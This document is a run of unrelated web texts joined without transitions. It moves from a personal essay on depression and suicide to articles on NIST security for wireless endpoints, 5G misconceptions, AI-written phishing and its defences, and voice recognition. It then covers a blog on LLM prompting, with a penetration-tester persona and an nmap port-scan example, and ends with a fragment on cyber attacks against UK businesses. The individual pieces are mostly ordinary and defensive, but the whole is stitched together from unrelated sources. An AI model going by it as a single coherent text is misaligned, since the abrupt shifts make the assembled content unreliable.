Imagine you have gone for a run but are entirely out of control of your own body. You are out of breath, exhausted, you feel that you cannot continue any more, and yet you keep running. Or imagine loud, disturbing music playing around you that you cannot turn off, no matter how hard you try.
In the four years I’ve suffered from depression, I’ve never been suicidal, even in my darkest days, but I have no doubt in my mind that if I had left things as they were and hadn’t asked for help, I was heading down this path. In those dark days, when I sat on my own struggling to come to terms with the diagnosis, I made a promise to myself that I would never, ever allow myself to get to a state where I could see no other way out but to take my own life.
Suicide is not only a problem for the individual. It’s our problem too, because we are the ones who have the power to build and change a society; we have the ability to change lives and make them better or worse; we have the power to say NO to toxic cultures and outdated and discriminatory beliefs. So next time when your train is cancelled because of ‘a tragic accident on the tracks’, spare a thought for the person who was failed by all of us as a society, and who saw no other way out but to end their life, and ask yourself the question ‘What can I do to make this world more accepting and more tolerant of who people are?’
If we could be more understanding, tolerant and accepting of each other, imagine what a difference it might make.
Wireless technologies are revolutionizing global communication and becoming indispensable to modern society. The rapid proliferation of these technologies, particularly wireless endpoints, has introduced many security challenges that pose significant threats to national security. As critical infrastructure systems increasingly rely on wireless communication, vulnerabilities associated with wireless endpoints can lead to catastrophic disruptions, jeopardizing public safety and the stability of nations.
The National Institute of Standards and Technology (NIST) has developed a series of frameworks to guide organizations in effectively managing cybersecurity risks. Implementing these frameworks, particularly the NIST Cybersecurity Framework, is crucial for enhancing the security posture of wireless endpoints and mitigating the potential threats they pose to national security.
By understanding the vulnerabilities and threats associated with wireless endpoints, organizations can develop and implement robust security measures, leveraging the guidance provided by the NIST Framework, to safeguard critical infrastructure and ensure a resilient and secure digital ecosystem for the future.
Wireless endpoints like smartphones, laptops, and IoT devices have become ubiquitous in modern society. As these devices continue to grow in number, so too do the associated security challenges. One fundamental approach to addressing these challenges is the implementation of robust cybersecurity frameworks, such as those developed by NIST. Wireless technologies have transformed the global communication landscape, and employees and companies alike have come to depend on them to operate efficiently. However, the widespread adoption of these technologies also presents numerous security challenges.
What is the NIST Cybersecurity Framework?
The NIST Cybersecurity Framework is a voluntary, risk-based set of guidelines to help organizations manage and reduce cybersecurity risk. The framework comprises five core functions: Identify, Protect, Detect, Respond, and Recover. These functions provide a high-level, strategic view of an organization’s cybersecurity risk management, enabling it to comprehensively understand its security posture and implement adequate controls.
Applicability of the NIST Framework to Wireless Endpoints
Identify: The Identify function is the first step in understanding an organization’s wireless endpoint landscape. Organizations can better understand these devices’ potential risks and vulnerabilities by identifying and categorizing wireless endpoints. This data serves multiple purposes, such as facilitating the development of effective risk management strategies and determining the most crucial security measures to implement.
Protect: The Protect function implements safeguards to ensure wireless endpoints’ confidentiality, integrity, and availability. This may involve using encryption, secure protocols, robust authentication mechanisms, enforcing security policies and regular updates to software and firmware.
Detect: The Detect function continuously monitors wireless endpoints to identify potential security incidents. This can include monitoring for unauthorized access, suspicious network activity, or indications of malware. By detecting potential threats in real-time, organizations can respond more quickly and effectively to mitigate their impact.
Respond: The Respond function is concerned with developing and implementing incident response plans for wireless endpoint security incidents. Contingency plans should outline the specific roles of response personnel and the processes and procedures to follow during an incident. Organizations must have processes in place to guarantee they are fully equipped to handle and contain security incidents related to wireless endpoints efficiently.
Recover: The Recover function focuses on restoring wireless endpoints and related systems to regular operation following a security incident. This involves the development of recovery plans, the implementation of lessons learned from previous incidents, and the establishment of communication channels to coordinate recovery efforts.
The NIST Cybersecurity Framework provides a valuable tool for organizations seeking to enhance the security of their wireless endpoints. By following the framework’s five core functions, organizations can better identify and manage the risks associated with these devices, implement appropriate security measures, and ensure a more robust security posture overall. Adopting the NIST framework concerning wireless endpoints is crucial for organizations to effectively safeguard against these technologies’ growing threats and vulnerabilities.
Wireless Endpoint Vulnerabilities
Insecure Protocols: Wireless communication relies on various protocols, such as Wi-Fi, Bluetooth, and Zigbee, to transmit data between devices. These protocols often suffer from insufficient authentication mechanisms that adversaries can exploit, leading to unauthorized access or data exfiltration.
Lack of Encryption: Encryption ensures secure communication between wireless endpoints. However, many devices still do not implement proper encryption techniques, leaving data vulnerable to interception and manipulation.
Default or Weak Credentials: Many wireless devices are manufactured and shipped with default or weak credentials, which attackers can easily exploit to gain unauthorized access. Users need to change default passwords to avoid unauthorized access.
Software and Firmware Vulnerabilities: Wireless endpoints are prone to software and firmware vulnerabilities like any other software-based system. Adversaries can exploit these vulnerabilities to compromise devices, potentially exfiltrating sensitive data.
Three Examples of Wireless Endpoint Vulnerabilities
- Insufficient Authentication Mechanisms: One common wireless endpoint security vulnerability is the implementation of weak or inadequate authentication mechanisms. Many wireless devices, including IoT devices and wireless routers, rely on default or easily guessable credentials, such as usernames and passwords, for user authentication. Additionally, some devices do not enforce the use of strong, unique passwords or multi-factor authentication (MFA) methods, making it easier for malicious actors to gain unauthorized access. Once an attacker gains control of a wireless endpoint, they may be able to compromise the confidentiality, integrity, and availability of sensitive information and launch further attacks on other connected systems.
- Unencrypted Data Transmission: Another prevalent wireless endpoint security vulnerability is the lack of encryption for data transmitted over wireless networks. If data is not encrypted, unauthorized parties may intercept or compromise the datalink. This vulnerability can lead to the exposure of sensitive information, such as personal data or intellectual property, and may facilitate unauthorized access to critical systems. To mitigate this risk, organizations should implement robust encryption protocols, such as Wi-Fi Protected Access 3 (WPA3) for Wi-Fi networks or Transport Layer Security (TLS) for web-based applications, to ensure the confidentiality and integrity of data transmitted over wireless networks.
- Outdated Software and Firmware: Outdated software and firmware on wireless endpoints pose a significant security risk, as they may contain known vulnerabilities that attackers can exploit. Manufacturers often release updates and patches to address identified security flaws; however, many wireless devices do not receive these updates automatically or on time. Some devices may even reach their end-of-life and no longer receive security updates, leaving them perpetually vulnerable. Organizations can reduce the risk of security breaches by implementing a solid patch management process. This involves updating all wireless endpoints regularly with the latest security patches and firmware, which can prevent known vulnerabilities from being exploited.
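The third example above, tracking outdated firmware, can begin with something as simple as comparing an asset inventory against the latest known release per model. A hypothetical sketch (every device, model, and version below is invented for illustration):

```python
def parse_version(ver: str) -> tuple:
    """'2.4.1' -> (2, 4, 1), so versions compare numerically."""
    return tuple(int(part) for part in ver.split("."))

# Hypothetical latest-release feed and device inventory.
latest_firmware = {"acme-router": "2.4.1", "acme-camera": "1.9.0"}
inventory = [
    {"host": "rtr-01", "model": "acme-router", "firmware": "2.4.1"},
    {"host": "cam-07", "model": "acme-camera", "firmware": "1.2.3"},
]

# Flag any endpoint running firmware older than the latest known release.
outdated = [dev["host"] for dev in inventory
            if parse_version(dev["firmware"])
            < parse_version(latest_firmware[dev["model"]])]
assert outdated == ["cam-07"]
```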
Threats to National Security
Cyber Espionage: State-sponsored threat actors can exploit wireless endpoint vulnerabilities to conduct cyber espionage operations. These operations may result in the exfiltration of sensitive government or military information, potentially undermining national security.
Critical Infrastructure Disruption: Many critical infrastructure systems, such as power grids, transportation systems, and water treatment facilities, rely on wireless communication. Attacks on these systems can result in widespread disruption and have catastrophic consequences for national security.
Mass Surveillance: The widespread adoption of wireless endpoints has made mass surveillance a significant concern. State-sponsored actors can exploit these vulnerabilities to intercept and monitor communication, eroding citizens’ privacy, and potentially suppressing dissent.
The rise of wireless endpoints has created a complex security landscape that presents numerous challenges to national security. Understanding and addressing these vulnerabilities effectively is critical to protecting the confidentiality, integrity, and availability of sensitive information and ensuring the continued resilience of national security infrastructure. Consequently, a proactive approach to securing wireless endpoints, including adopting secure protocols, encryption, and regular software updates, is essential to mitigate the risks posed by these technologies.
In conclusion, the rapidly evolving landscape of wireless endpoints and their associated security challenges necessitates a comprehensive and structured approach to securing these devices. The NIST Cybersecurity Framework offers a practical, risk-based methodology for organizations to identify, protect, detect, respond, and recover from potential security incidents. By adhering to this framework, organizations can bolster the security of their wireless endpoints, mitigating the risks posed by a wide range of threats and ultimately contributing to the protection of critical infrastructure and national security interests. As technology advances and new vulnerabilities emerge, adopting robust cybersecurity frameworks like the NIST Cybersecurity Framework will remain essential in fostering a resilient and secure digital ecosystem for the future.
In late 2019, IDC projected the number of 5G connections to grow to 1.01 billion by 2023, representing a compound annual growth rate of 217.2 percent over the 2019-2023 forecast period. While it’s still unknown how the pandemic will impact those numbers, one thing is certain: 5G will play a major role in shaping how we interact with and use connected technologies.
However, it’s shortsighted to think that 5G is the sole connectivity technology that will witness growth. As 5G deployments increase, we’ll also see a rise in alternative technologies that offer flexible, cost-effective, low-power, and low-bandwidth options for IoT deployments. These technologies can be used in conjunction with 5G or on their own, as the application calls for it. That means the emergence of 5G isn’t just about transforming low-latency, high-throughput applications; it also represents a transformation of how traditional cellular networks interact with other communication technologies and sit within the larger ecosystem.
With so much buzz around 5G, it’s easy to forget that other options out there are better suited to a vast range of applications. To clear up some of the confusion, let’s examine three common misconceptions about 5G to be aware of.
5G Makes Sense For All Verticals
5G was designed with two particular characteristics in mind: faster speeds and greater connectivity for those using it. While the increased bandwidth and performance capabilities of 5G are perfectly suited to several applications, there are scenarios where the trade-offs between cost, performance, and ROI open the door for complementary “right-size” technologies like LoRaWAN. So while 5G may be the optimal technology to support applications like video calls, which require low latency, an alternative technology like LoRaWAN is a better fit for water and gas metering, where low power consumption and long range are required.
5G Works Alone
Not all applications are created equal, which means there’s no one-size-fits-all approach. This is why connectivity solutions in the wireless market follow a multi-radio access network strategy. 5G is the first version of the 3GPP specifications to open the standard to any communication technology, whether licensed or unlicensed, mobile, wired, or fixed wireless. This means that depending on the application, the 5G ecosystem can adopt the best technology to support its needs – whether that’s LoRaWAN, 5G, 4G, Wi-Fi, BLE, or a combination of several.
5G Is Here
Research is mixed on what the pandemic means for 5G rollouts. According to an S&P Global report, Kagan’s 2020 global 5G survey of more than 70 mobile operators found that 38 percent of respondents are already offering 5G service, with an additional 36 percent planning 5G services during 2021. On the other hand, a PwC report found that the pandemic will delay the rollout of 5G networks in Europe by 12 to 18 months. Putting the pandemic aside, the transition from 4G to 5G was already going to take a significant time investment. Inevitably there will be industries and consumers quicker on the adoption curve, but for a vast majority of the world, the impact of 5G is still a way out. This is particularly true for rural areas where many businesses and communities don’t have reliable connectivity, let alone high-speed internet or mobile data.
As deployments become more of a reality, 5G networking will continue to be a hot topic for the wireless and IoT industries. As that happens, more attention should also be given to the complementary technologies that support 5G. As it is with most things in life, the key is choice. Consumers and businesses alike must be given options to implement the technology that makes the most sense for a given application.
How Artificial Intelligence Levels Up Email Phishing
Email phishing attacks — which already account for nearly 90% of all data breaches — are becoming even more pervasive and harder to detect as threat actors incorporate chatbots and other artificial intelligence (AI) tools into their strategies.
Today, bad actors are increasingly turning to generative AI writing tools like ChatGPT, Bard, and Jasper to create credible phishing emails and even efficiently translate the scams into multiple languages using free services like Google Translate.
As a result, attackers can launch these attacks en masse and at scale. These new technologies enable them to be much more efficient than they would be if they had to manually develop the entire phishing attack, giving them more time and cover to gain access to networks. Once inside, they can monetize the attack by launching lucrative ransomware and malware attacks or committing funds transfer fraud (FTF).
How is AI used in email phishing?
In the past, one of the telltale signs of a phishing attack was receiving a message filled with typographical errors and poor grammar. While professional emails might contain an error here and there, most are usually well-written, so when you receive one filled with mistakes that purportedly comes from a reliable source, it should raise some red flags. In many cases, email filters will flag these types of messages as spam, preventing them from reaching unsuspecting users' inboxes in the first place.
Thanks to generative AI writing tools, however, it’s now much easier for bad actors — whose attempts have previously been thwarted by bad writing and poor grammar — to create well-written messages that are more convincing and can slip past email filters.
AI email phishing attacks at scale
Imagine, for example, a group of non-English speaking hackers gets together to launch multiple phishing scams. Since none are native English speakers, we could assume none can write well in English either.
From wherever they are in the world, using generative AI, this group can now create mostly flawless phishing messages. And they can then translate those messages into any languages they like — German, French, Italian, Chinese, and Japanese — enabling them to target more businesses across more geographies faster, all while sounding like a native speaker of each language (or at least close enough).
With this technology, hackers can cover considerably more ground. Since phishing is mostly a numbers game — hackers only need to dupe a single user to gain network access — this increases the likelihood of a successful attack.
How to spot an AI-based phishing attempt
While life may have gotten easier for hackers launching phishing attacks, that doesn't mean companies are completely out of luck. Taking a proactive approach to cybersecurity and ensuring your team knows what to look for in an attack can increase the chances bad actors don’t get inside your network.
With that in mind, here are four tactics your team can use to identify phishing attacks — and even prevent them from occurring in the first place.
1. Use the same tried-and-true tactics
Though phishing emails may no longer be riddled with grammatical errors, there are still several obvious indicators that suggest an email might be fraudulent. Employees should be skeptical of messages that lack personalization, ask you to download an attachment or click a link, imply urgency, or include requests for sensitive information. Employees should also be taught to hover over the sender’s email address to ensure it comes from a legitimate domain — not a spoofed one.
For example, a legitimate address might come from the domain example.com, whereas a spoofed domain could read examp1e.com, with the digit '1' standing in for the letter 'l'. Another tip-off may come from security banners inserted by your organization’s IT team ('this message came from outside your organization') or by your email security platform ('be careful with this message').
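The domain check described above can also be automated in simple tooling. The sketch below is illustrative only: the function names and the allowlist are assumptions, and production mail filters additionally inspect headers such as Return-Path and authentication results.

```python
def sender_domain(address: str) -> str:
    """Return the domain portion of an email address, lowercased."""
    return address.rsplit("@", 1)[-1].lower()

def is_trusted_sender(address: str, trusted_domains: set) -> bool:
    """True only when the sender's domain is on an explicit allowlist."""
    return sender_domain(address) in trusted_domains

# A lookalike domain fails the check even though it resembles the real one.
trusted = {"example.com"}
print(is_trusted_sender("alice@example.com", trusted))   # True
print(is_trusted_sender("alice@examp1e.com", trusted))   # False
```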
2. Prioritize security awareness training
Since hackers continue to develop new attack methods — and over 95% of security incidents involve human error — organizations must prioritize security awareness training. This training will help ensure employees have the most current information about evolving threats, know what to look for in a phishing attack, and understand what to do next after they’ve received a phishing email or clicked on a suspicious link.
3. Implement robust security controls
By taking a proactive approach to cybersecurity, it’s possible to prevent phishing attacks from reaching their intended target: your employees. For example, email security suites can automatically flag risky emails, check for malicious attachments and forwarding rules, and monitor login behavior to automatically identify suspicious login attempts. Coalition Control users have access to a Marketplace of partners that offer discounted cybersecurity solutions on services such as multi-factor authentication (MFA), endpoint detection and response (EDR), free security training, phishing simulations, and more.
Additionally, companies can publish public domain name system (DNS) records — including Sender Policy Framework (SPF), DomainKeys Identified Mail (DKIM), and Domain Message Authentication Reporting & Conformance (DMARC) technologies — to limit an attacker’s ability to send messages that falsely appear to be coming from your domains. They can also implement access controls like MFA, which make it that much harder for a bad actor to do their dirty work.
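As an illustration, SPF, DKIM, and DMARC policies are published as DNS TXT records. The zone-file entries below are placeholders: the selector name, the included SPF host, the public key, and the reporting address would all be specific to your environment.

```
example.com.                      IN TXT "v=spf1 include:_spf.example.net -all"
selector1._domainkey.example.com. IN TXT "v=DKIM1; k=rsa; p=<base64-encoded-public-key>"
_dmarc.example.com.               IN TXT "v=DMARC1; p=quarantine; rua=mailto:dmarc-reports@example.com"
```

Receiving servers look up these records to verify that a message really originated from the domain it claims, then apply the published policy to any failures.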
4. Use secure financial practices related to email
FTF claims occur when cyber criminals gain unauthorized access to a network, often via a phishing email, and then redirect or change payment information to steal funds.
To combat FTF events, implement the following best practices:
Utilize secure financial practices related to email.
Don't add or update payment information (e.g., bank account numbers, wire details) based only on an email.
Always confirm new or changed payment information using a known good contact number (avoid calling the number in the email, as attackers can change or intercept these numbers), and for large payments, require multiple team members to approve the updates.
Keeping pace with bad actors
To learn more about how phishing has evolved, keep an eye out for Coalition’s upcoming 2023 Claims Report, which analyzes how our claims and security monitoring data trends have evolved over the last six months and year over year.
Until then, watch this space for more news, security alerts, and other timely cybersecurity information, or connect directly with our Security Labs team on Twitter @CoalitionSecLab.
Advantages and drawbacks of Voice Recognition Technology
Voice recognition, achieved through a VUI (Voice User Interface), is the ability of a programmed machine to respond to voice commands. With the efficiency and convenience associated with the technology, it is fast becoming a way to help bridge the gap in professional task management and daily activities. Voice recognition is becoming more sophisticated and reliable, and as such, we can expect the technology to be implemented more widely across many different industries. At present, consumer trends demonstrate rapid adoption of this new capability, with many companies striving to create optimal VUI experiences. Inside Telecom has compiled a few key advantages and drawbacks of this evolving technology.
Advantages of Voice and Speech Recognition technology
Talking is faster than typing!
Voice commands are a far more efficient tool than typing a message. Advancements are being made in technology to make life easier, and voice recognition is being built into more devices to help boost convenience and efficiency. Voice recognition software has improved, and according to a Stanford University study, it has become significantly faster and more accurate at producing text (through speech-based dictation on a mobile device) than we are at typing on a keyboard.
By integrating technology, such as those offered by voice solutions, businesses can streamline documentation processes, and alleviate the burden of typing and other admin tasks, enabling professionals to focus on more challenging and rewarding aspects of the job.
VUI has come a long way
VUI is constantly evolving and has come leaps and bounds from the older software once produced for companies’ customer service centers. We all remember encountering a rather frustrating automated service that did not have the advanced capability of understanding or responding to our voice commands (the first time around). Today, companies have implemented more developed voice recognition software that makes interaction with a robot feel more like a conversation with a human. And deep machine learning means VUI software is able to understand more complex and diverse word responses. This shows that researchers are going the extra mile to improve VUI devices in a way that fits into society and our broadening scope of needs.
Voice recognition boosts productivity levels
Voice recognition and speech activation are being developed for a whole myriad of reasons. The most essential role they may have is in the workplace, where they can provide support and assistance with task-management duties. Amazon’s Alexa can be used for managing and setting up conference calls as well as scheduling meetings and setting up reminders – this enables a company to streamline the process for everyone, which boosts productivity and efficiency levels.
This technology is making it possible to access big data instantly, allowing professionals to retrieve important information upon a voice command. As the technology develops, it will become commonplace to ask a question or request data for any specific case or project – taking less time than it would for us to manually search for information.
It can also streamline communication between people who speak different languages. The software has the capability of translating what is said in a foreign language into the native language for the recipient of the information to understand – which essentially helps one move beyond potential language barriers in daily business practices.
Drawbacks of voice and speech recognition
Privacy of voice recorded data
More devices are using VUI technology, which presents new challenges for data privacy. If a device has this capability, additional data can be tracked by the manufacturer. There have been concerns in the past that manufacturers could listen in on private conversations. These concerns have prompted companies to work on offering better privacy controls for users.
Error and misinterpretation of words
Not all words are accurately interpreted with voice recognition. It is far easier for a human to decode words and turn them into meaning than it is for voice recognition software to do so. The software’s limited grasp of the contextual relationships between words may disrupt any given task assigned to it along the way. It may also encounter problems with slang words, acronyms, or technical jargon.
Bronwen Aker //
Sr. Technical Editor, M.S. Cybersecurity, GSEC, GCIH, GCFE
Go online these days and you will see tons of articles, posts, Tweets, TikToks, and videos about how AI and AI-driven tools will revolutionize your life and the world. While a lot of the hype isn’t realistic, it is true that LLMs (large language models) like ChatGPT, Copilot, and Claude can make boring and difficult tasks easier. The trick is in knowing how to talk to them.
LLMs like ChatGPT, Copilot, and Claude are text-based tools, so it should be no surprise that they are very good at analyzing, summarizing, and generating text that you can use for various projects. Like any other tool, however, knowing how to use them well is critical for getting the positive results you want. In a recent webcast (https://www.youtube.com/watch?v=D1pIfpcEBtI), I shared some tips and tricks for using LLMs more effectively, and I’m including them here again for your use.
First, some definitions:
- Artificial Intelligence (AI): “Artificial intelligence” refers to the discipline of computer science dedicated to making computer systems that can think like a human.
- Large Language Models (LLMs): A type of AI model that can process and generate natural language text.
- Models: A “model” refers to a mathematical framework or algorithm trained on vast datasets to recognize patterns, understand language, and generate human-like text based on the input it receives. These models use neural networks to process and predict information, enabling them to perform tasks such as text completion, translation, and question-answering.
- Prompt: A prompt is the input text or query given to the model to elicit a response. It guides the model’s output by providing context, instructions, or questions for the model to process and generate relevant text.
So, to summarize: LLMs are a form of AI. We use prompts to give LLMs instructions or commands. They reply with responses and/or output that resembles text that would be generated by a human. The challenge, however, is that not all prompts are created equal.
I tend to classify prompts using the following categories:
- Simple Query: A lot like a search engine query, but will usually give you more relevant results. Good for “quick and dirty” questions or tasks.
- Detailed Instruction: Includes some specifics about the task to be performed and may include some direction regarding how to render or organize the resultant output.
- Contextual Prompt: A structured prompt that includes several layers of instruction and very specific directions on how to format and organize the output.
- Conversational Prompt: Less of a single prompt and more like a conversation with another person. Great for brainstorming and/or refining ideas in an iterative manner.
This prompt is easy and is the format used by most people most of the time. All it involves is asking a simple question like, “What is the airspeed velocity of an unladen swallow?” or, “What is the ultimate answer to the ultimate question of Life, the Universe, and Everything?”
Usually, the response is more useful than what you might get from a search engine because it answers the question rather than giving you links to millions of web pages that might have the answer you are looking for.
This is a medium complexity prompt where you give the LLM more detail about what you want it to do. For example:
I need a Python script that will sort internet domains, first by TLD, then by domain, then by subdomains. The script needs to be able to deal with multiple subdomains. e.g., www.jpl.nasa.gov.
In this example, I’ve told the LLM that I want a Python script, and I’ve given several specific criteria about how it should work. While this is better than a Simple Query, it may require more than one attempt to get output that works properly or otherwise meets your needs.
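For reference, a working version of the kind of script this prompt asks for might look like the sketch below (my own hedged implementation, not actual LLM output). Reversing the labels puts the TLD first, so ordinary tuple comparison yields the requested ordering at any subdomain depth:

```python
def sort_domains(domains):
    """Sort domains by TLD, then domain, then successive subdomain labels."""
    # "www.jpl.nasa.gov" -> ("gov", "nasa", "jpl", "www"), so tuple
    # comparison orders by TLD first and handles any subdomain depth.
    return sorted(domains, key=lambda d: tuple(d.lower().split(".")[::-1]))

hosts = ["www.jpl.nasa.gov", "mail.example.com", "nasa.gov", "example.com"]
print(sort_domains(hosts))
# ['example.com', 'mail.example.com', 'nasa.gov', 'www.jpl.nasa.gov']
```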
Contextual Prompts are the most involved, but defining what you want and how you want it will pay off in the end.
The Microsoft Learn website has a page about LLM prompt engineering (https://learn.microsoft.com/en-us/ai/playbook/technology-guidance/generative-ai/working-with-llms/prompt-engineering#prompt-components) that includes the following graphic showing how to craft a good contextual prompt:
Who Are You?
First, Microsoft recommends providing “Instructions.” I like to call it “defining the persona” that you want the LLM to adopt for the purposes of this task. Doing so sets the stage for a lot of things, from the field of study to the voice or other “standards” that may be applicable, depending on the subject involved.
Here are some examples:
You are an advanced penetration tester who is adept at using the Kali Linux penetration testing distribution. You know its default tools, and you know many ways to optimize ethical hacking commands that may be used during a pentest. You are able to speak with other geeks, with C-Suite executives, and everyone in between.
You are an expert chef who specializes in easy-to-make meals for families that have several children. Whenever possible, you strive to balance good nutrition with convenience in preparing meals that everyone in the household can enjoy. Your tone is light and informational, encouraging others to prepare meals that are tasty, economic, and don't take a huge amount of time to make.
You are a friendly and imaginative storyteller who loves creating engaging and comforting bedtime stories for young children aged up to 6 or 7 years old. Your stories are designed to be soothing, filled with gentle adventures, and often feature relatable characters, animals, and simple lessons that encourage social behavior.
Note: When in doubt, more instruction is better.
Next comes what Microsoft calls “task-specific knowledge.” This is where you set the stage for the subject matter involved. Obviously, you can be as detailed as you want.
Guidance provided should be appropriate for ethical hackers, cybersecurity researchers, and other infosec professionals who may be engaged in penetration tests.
Meals should be designed to appeal to both adults and children, with options for picky eaters and variations to accommodate dietary restrictions or preferences. The goal is to help busy parents prepare delicious and healthy meals that the whole family can enjoy together.
Stories should be age-appropriate, free of any frightening or overly complex content, and aim to inspire a sense of wonder and security as children prepare to sleep.
Examples to Follow/Emulate
Providing an LLM with an example to follow is incredibly important. Because LLMs and other AIs are not *actually* intelligent, they have no way of knowing what you want unless you tell them, specifically and in great detail. (This applies to people, too, but that’s a different blog post. 😉 )
The examples you provide will not only serve as templates the LLM can follow, but they give you the opportunity to include any specific details, formatting conventions, etc., that you want in the final product. Think of it as setting the LLM up for success.
Run the Nmap Command:
Execute the following command in your terminal to perform a basic TCP SYN scan (-sS) on the first 1000 ports (-p 1-1000) of the target IP address 192.168.1.1:
`nmap -sS -p 1-1000 192.168.1.1`
Explanation of Command:
`nmap`: The command to run Nmap.
`-sS`: Performs a TCP SYN scan, which is a quick and stealthy method to scan ports.
`-p 1-1000`: Specifies the range of ports to scan (ports 1 through 1000).
`192.168.1.1`: The target IP address to scan. Replace this with the actual IP address of your target.
Crockpot Chicken and Vegetables
4 boneless, skinless chicken breasts
4 large carrots, peeled and cut into chunks
4 potatoes, peeled and cut into chunks
1 onion, chopped
3 garlic cloves, minced
1 cup chicken broth
1 teaspoon dried thyme
1 teaspoon dried rosemary
Salt and pepper to taste
Place the chicken breasts in the bottom of the crockpot.
Add the carrots, potatoes, onion, and garlic on top of the chicken.
Pour the chicken broth over the ingredients.
Sprinkle the thyme, rosemary, salt, and pepper over everything.
Cover and cook on low for 6-8 hours, or until the chicken and vegetables are tender.
Serve the chicken and vegetables directly from the crockpot, and enjoy a hearty, no-fuss dinner with minimal cleanup.
Note: If you want the recipes to be more accessible to international readers, consider including both metric and imperial measurements in your example.
The Adventures of Timmy and the Magic Tree
Once upon a time, in a little village nestled at the edge of a big, enchanted forest, there lived a boy named Timmy. One sunny afternoon, Timmy decided to explore the forest, where he discovered a magical tree that sparkled with colorful lights. The tree spoke to him in a gentle voice, "Hello, Timmy! I grant one wish to every child who finds me." Timmy thought carefully and wished for the ability to talk to animals. Suddenly, he heard a chorus of happy voices as the forest animals gathered around, eager to chat and share their stories. From that day on, Timmy had new friends and endless adventures in the enchanted forest, always returning home with wonderful tales to share.
And every night, as he drifted off to sleep, Timmy dreamt of the magical tree and the delightful conversations he would have the next day.
Question or Task Request
Once you have established the context, it’s time to make the actual ask of your LLM, telling it what you want it to do. The work you’ve invested in setting the stage will pay off in much more reliable results, but you may need to tweak and refine things a bit. This isn’t necessarily a bad thing, however.
Even if you set the stage extensively and gave detailed examples and instructions, the LLM is not going to say things exactly the way you would. Don’t hesitate to tweak the output, adjusting word choices, punctuation, or formatting to add your own personal stamp to things.
I think of it like this: When I bake, I start with a box mix, but I add extra goodies to enhance what is already there. It may be something as minor as adding extra cinnamon to a banana bread mix, or almond extract to poppy seed muffins. Or it could be something more extensive like including orange juice and pudding mix to a chocolate cake batter.
At the end of the day, anything you publish is your responsibility, regardless of what tools you leveraged to generate the final product. Invest the time to make sure that what you post, print, or publish says what you want to say and in the way you want to say it. LLMs like ChatGPT, Copilot, Claude, Ollama, etc., are there to *help* you, not replace you, no matter what the media and overzealous upper managers may think.
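Putting the pieces together, the four components of a contextual prompt (persona, task-specific knowledge, examples, and the task itself) map naturally onto the system/user message convention that most chat-style LLM APIs accept. The helper below is vendor-neutral, and its name is my own invention:

```python
def build_messages(persona, knowledge, examples, task):
    """Assemble persona, task knowledge, examples, and the ask into chat messages."""
    # Persona and domain knowledge set the stage, so they go in the system message.
    system = persona.strip() + "\n\n" + knowledge.strip()
    # Examples to emulate precede the actual request in the user message.
    user_parts = [f"Example to emulate:\n{e}" for e in examples]
    user_parts.append(task.strip())
    return [
        {"role": "system", "content": system},
        {"role": "user", "content": "\n\n".join(user_parts)},
    ]

messages = build_messages(
    persona="You are an expert chef who specializes in easy-to-make family meals.",
    knowledge="Meals should appeal to both adults and children.",
    examples=["Crockpot Chicken and Vegetables: chicken, carrots, potatoes..."],
    task="Suggest a weeknight dinner that cooks in under 30 minutes.",
)
print(messages[0]["role"], "->", messages[1]["role"])  # system -> user
```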
For me, conversational prompts are where LLMs really shine because it feels less like work and more like I’m chatting with my own personal mentor, tutor, or subject matter expert. Much as what happens when discussing things with another human, having a conversation with ChatGPT or some other LLM is an iterative, evolutionary process. As the conversation progresses, it evolves, refining the focus or direction of what is being discussed.
There is another, very important reason that I like chatting with ChatGPT.
LLMs are non-judgmental. They don’t criticize, patronize, or make me feel less than adequate when I ask questions or need clarification. That makes LLMs extremely effective when learning new material or subjects.
As someone who has worked for decades in various aspects of information technology, I know very well that, while there are many people who will share what they know with others freely and with lots of encouragement, there are enough people in IT who see asking questions as a sign of ignorance and incompetence. Instead of seeing questions as a desire to learn and become more capable, they are seen and treated as weakness, and the questioner is branded as being unqualified and incapable.
This negative attitude can be especially daunting for people who are just starting in a new job role or career track, as well as for women, people of color, neurodivergents, and other minority groups. Luckily, LLMs don’t care about those things, and they have tons of information that you can use to improve your knowledge and skills.
At the End of the Day…
As I said before, anything you publish, print, post, or share through other means is ultimately *your* responsibility, regardless of what tools you leveraged to generate the final product. Moreover, LLMs are new technology. They get things wrong, have “hallucinations” where they make things up, and sometimes go in completely wrong directions. That means you have to be the “adult,” supervising their work and ensuring that the final product is accurate and appropriate.
The more you work with LLMs like ChatGPT, Copilot, Claude, Ollama, etc., the better you will be at avoiding pitfalls or course-correcting when they happen.
Knowledge is power, and I hope the information I shared here will help you to embrace your inner superhero.
Additional References and Resources
- ChatGPT: https://chatgpt.com
- Copilot: https://copilot.microsoft.com/
- Claude: https://www.anthropic.com/claude
Tools to Run LLMs Locally
Other Fun Toys!
- Fabric: https://github.com/danielmiessler/fabric
- Sudowrite: https://www.sudowrite.com/
- Lore Machine: https://www.loremachine.world
Getting started with LLM prompt engineering
- Network Chuck https://www.youtube.com/@NetworkChuck
Ready to learn more?
Level up your skills with affordable classes from Antisyphon!
Available live/virtual and on-demand
The almost complete reliance on the internet means that everything from economic vitality to national elections is affected by the changing landscape of cyberspace.
The global dependence on this infrastructure has exposed a plethora of vulnerabilities that are being exploited on a daily basis by criminal groups, lone cyber attackers and state-sponsored actors.
Increasingly, it is the business sector that is now taking the brunt of their attacks.
This concentration of cyber-attacks on a single sector has been well documented in government research into cyber security.
Findings from the 2016 Cyber Security Breaches Survey revealed that two thirds of big businesses have been the victim of a cyber-attack in the past year alone, with the cost of some of these breaches reaching into the millions of pounds.
>See also: Britain’s cyber security gap…it’s bad
Across the globe, corporate executives and board members have ranked cyber threats as the third highest risk to their businesses, behind that of customer loss and taxation. Just as worrying is the increasing number of attacks on smaller enterprises.
According to statistics released by internet security firm Symantec, 43% of the global attacks logged during 2015 were against small firms – a figure that is increasing year-on-year.
The increase in attacks comes down to a number of contributing factors. Companies now store a wealth of customer and employee data, yet too many of these companies still lack a security infrastructure that can competently defend against internal or external breaches.
Critical information is being protected by weak security; an opportunity that is too good to pass up for most cyber criminals.
Implementing business-wide cyber security processes and technology is costly and requires experts with the experience and knowledge to carry out effectively.
However, the IT security skills gap has created a drought that is affecting the industry’s ability to build the workforce of cyber defenders so urgently needed.
There is now a severe vacuum of man-power. The (ISC)2 Global Information Security Workforce Study predicts there will be a shortage of 1.5 million information security professionals by 2020. This shortfall is having a knock-on effect that is directly impacting how businesses can respond to cyber-attacks.
One in five organisations throughout the public and private sector admitted that it could take between eight days and eight weeks to repair the damage from a cyber-attack. Nearly half (45%) blamed the lack of qualified staff.
